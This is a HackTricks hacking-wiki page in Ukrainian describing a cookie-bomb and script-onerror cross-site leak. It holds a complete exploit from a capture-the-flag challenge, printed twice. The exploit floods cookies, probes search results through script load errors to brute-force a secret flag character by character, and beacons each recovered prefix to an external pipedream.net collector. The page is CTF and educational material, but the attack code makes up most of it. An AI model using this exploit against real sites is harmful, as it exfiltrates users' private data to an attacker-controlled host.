Cookie Bomb + Onerror XS Leak

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Наступний скрипт, взятий з тут, експлуатує функціональність, яка дозволяє користувачу вставляти будь-яку кількість куків, а потім завантажує файл як скрипт, знаючи, що справжня відповідь буде більшою, ніж хибна, і тоді. Якщо успішно, відповідь є перенаправленням з URL, що в результаті довший, занадто великий для обробки сервером, тому повертає код статусу помилки http. Якщо пошук не вдається, нічого не станеться, оскільки URL короткий.

<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form>
<script>
const $ = document.querySelector.bind(document);
const sleep = (ms) => new Promise(r => setTimeout(r, ms));
let i = 0;
const stuff = async (len=3500) => {
let name = Math.random();
$("form").target = name;
let w = window.open('', name);
$("#f").value = "_".repeat(len);
$("#f").name = i++;
$("form").submit();
await sleep(100);
};
const isError = async (url) => {
return new Promise(r => {
let script = document.createElement('script');
script.src = url;
script.onload = () => r(false);
script.onerror = () => r(true);
document.head.appendChild(script);
});
}
const search = (query) => {
return isError("https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query));
};
const alphabet = "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ";
const url = "//en4u1nbmyeahu.x.pipedream.net/";
let known = "actf{";
window.onload = async () => {
navigator.sendBeacon(url + "?load");
await Promise.all([stuff(), stuff(), stuff(), stuff()]);
await stuff(1600);
navigator.sendBeacon(url + "?go");
while (true) {
for (let c of alphabet) {
let query = known + c;
if (await search(query)) {
navigator.sendBeacon(url, query);
known += c;
break;
}
}
}
};
</script>

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.

PreviousConnection Pool by Destination Example NextURL Max Length - Client Side

Last updated 4 months ago

<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form> <script> const $ = document.querySelector.bind(document); const sleep = (ms) => new Promise(r => setTimeout(r, ms)); let i = 0; const stuff = async (len=3500) => { let name = Math.random(); $("form").target = name; let w = window.open('', name); $("#f").value = "_".repeat(len); $("#f").name = i++; $("form").submit(); await sleep(100); }; const isError = async (url) => { return new Promise(r => { let script = document.createElement('script'); script.src = url; script.onload = () => r(false); script.onerror = () => r(true); document.head.appendChild(script); }); } const search = (query) => { return isError("https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query)); }; const alphabet = "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ"; const url = "//en4u1nbmyeahu.x.pipedream.net/"; let known = "actf{"; window.onload = async () => { navigator.sendBeacon(url + "?load"); await Promise.all([stuff(), stuff(), stuff(), stuff()]); await stuff(1600); navigator.sendBeacon(url + "?go"); while (true) { for (let c of alphabet) { let query = known + c; if (await search(query)) { navigator.sendBeacon(url, query); known += c; break; } } } }; </script>